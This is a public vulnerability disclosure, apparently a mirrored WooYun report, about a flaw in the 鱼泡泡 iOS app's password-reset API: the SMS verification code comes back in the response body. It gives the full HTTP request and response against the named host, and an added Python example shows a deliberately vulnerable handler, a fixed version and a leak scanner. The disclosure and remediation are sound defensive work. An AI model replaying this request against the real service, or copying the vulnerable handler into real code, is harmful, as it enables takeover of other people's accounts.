WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-04-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-06-04: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
As the title says.
Addendum: the problem is in the password-recovery function. The verification code is written into the response body, so the password of any account can be reset.
POST /api/index HTTP/1.1
Host: yppapi.wanyoo.com
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 279
Connection: close
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f10d8f4538db2ab59ed4ffa1bc8f9a3a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22183.129.152.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A55%3A%22%E9%B1%BC%E6%B3%A1%E6%B3%A1+2.1+rv%3A2.1.3+%28iPhone%3B+iPhone+OS+6.1.2%3B+en_US%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1428372131%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De8c2af02f83a6b622bd193830dd06b45
User-Agent: 鱼泡泡 2.1 rv:2.1.3 (iPhone; iPhone OS 6.1.2; en_US)

screen=640%2A960&device_model=iphone&signature=1acc1833fd225f81d57f90e67195172baa94c131&sys_version=7.1.2&request=xxxx&method=SendVericode&soft_version=1.0&platform=ios&timespan=1428374163689

Above is the request; what matters is the response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Apr 2015 02:36:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
Content-Length: 113

{"code":"8000","result":{"vericode":"6164","send_channel":"106550251961906666","match_str":"\u9c7c\u6ce1\u6ce1"}}

Holy shit!! The vericode is written in the response!!! Heavens~
Fix: modify the corresponding operation in the Model and strip the unnecessary fields from the JSON response.
Unable to contact the vendor, or the vendor actively declined.
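To make that fix concrete, here is an added example, not the vendor's code (the page shows only the captured traffic; the X-Powered-By header points at PHP, but Python is used here so the logic is self-contained and runnable). It puts a SendVericode handler that echoes the model's result, the report's flaw, next to a fixed handler that returns only a delivery status and keeps the code server-side as a keyed hash with expiry, an attempt limit and single use. A small leaked_keys scanner flags the response body from the page and can serve as a regression test. The function names, the in-memory _PENDING store, _SERVER_SECRET and the fake SMS gateway are all assumptions for the example.

```python
import hashlib
import hmac
import json
import secrets
import time

# Constructed stand-ins for the app's storage and SMS gateway; the real
# service's code is not on the page, only its HTTP traffic.
_PENDING = {}                                # phone -> pending-code record
_SERVER_SECRET = secrets.token_bytes(32)     # assumed per-deployment HMAC key
CODE_TTL_SECONDS = 300
MAX_ATTEMPTS = 5
SENSITIVE_KEYS = {"vericode", "verify_code", "otp", "sms_code"}


def _digest(phone, code):
    # Store only a keyed hash so a database read does not yield usable codes.
    msg = f"{phone}:{code}".encode("utf-8")
    return hmac.new(_SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def _issue(phone, sms_gateway):
    code = f"{secrets.randbelow(10 ** 6):06d}"   # CSPRNG, six digits
    _PENDING[phone] = {
        "digest": _digest(phone, code),
        "expires": time.time() + CODE_TTL_SECONDS,
        "attempts": 0,
    }
    channel = sms_gateway(phone, code)           # the code leaves only via SMS
    return code, channel


def send_vericode_vulnerable(phone, sms_gateway):
    """Reproduces the report's flaw: the model's full result, code included,
    is serialized straight into the API response."""
    code, channel = _issue(phone, sms_gateway)
    return {"code": "8000",
            "result": {"vericode": code, "send_channel": channel}}


def send_vericode_fixed(phone, sms_gateway):
    """Same flow, but the response carries only a delivery status."""
    _issue(phone, sms_gateway)
    return {"code": "8000", "result": {"sent": True}}


def verify_code(phone, submitted):
    """Server-side check with expiry, attempt limit and constant-time compare."""
    entry = _PENDING.get(phone)
    if entry is None:
        return False
    if time.time() > entry["expires"]:
        del _PENDING[phone]
        return False
    entry["attempts"] += 1
    if entry["attempts"] > MAX_ATTEMPTS:
        del _PENDING[phone]                      # burn the code after too many tries
        return False
    ok = hmac.compare_digest(entry["digest"], _digest(phone, str(submitted)))
    if ok:
        del _PENDING[phone]                      # single use
    return ok


def leaked_keys(body):
    """Walk a JSON response body and list any secret-bearing keys it exposes."""
    found = []

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key.lower() in SENSITIVE_KEYS:
                    found.append(key)
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(json.loads(body))
    return found


if __name__ == "__main__":
    outbox = {}                                  # constructed fake SMS outbox

    def fake_sms(phone, code):
        outbox[phone] = code
        return "constructed-channel-id"

    print(leaked_keys(json.dumps(send_vericode_vulnerable("13800000000", fake_sms))))
    print(leaked_keys(json.dumps(send_vericode_fixed("13800000001", fake_sms))))
    print(verify_code("13800000001", outbox["13800000001"]))
```

Running leaked_keys over the response body captured on the page returns ["vericode"], which is exactly the condition a pre-release test of this endpoint should fail on; the fixed handler's response contains no such key, and the only way to pass verify_code is to present the code that went out through the SMS gateway, within its lifetime and attempt budget.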